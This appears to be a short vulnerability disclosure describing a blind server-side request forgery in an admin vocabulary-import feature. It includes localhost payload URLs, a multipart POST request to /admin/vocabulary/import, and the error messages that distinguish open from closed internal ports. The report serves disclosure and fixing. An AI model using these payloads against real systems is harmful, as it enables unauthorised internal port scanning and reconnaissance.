There is Blind SSRF on the vocabulary screen in the administrator screen.
Step 1. Log in to the administrator screen and access “Import new vocabulary” from the “vocabulary” page.
Step 2. Specify the following Payload in the “Vocabulary URL” field and check that the local environment can be accessed from the response result. (File format: JSON-LD
)
Open Port
http://localhost:80
Open Port
http://localhost:443
Closed Port
http://localhost:1234
POST /admin/vocabulary/import HTTP/1.1
...
-----------------------------28807843559236410972421406436
Content-Disposition: form-data; name="vocabulary-file[url]"
http://localhost:80
-----------------------------28807843559236410972421406436
Content-Disposition: form-data; name="vocabulary-file[format]"
jsonld
-----------------------------28807843559236410972421406436
...
Open Port
Unable to load the remote document "<!DOCTYPE html ...
Closed Port
Unable to connect to localhost:1234 (Connection refused)
https://drive.google.com/file/d/10SmI9dtRewubES4kRHHk2xyupG_GxLF5/view?usp=sharing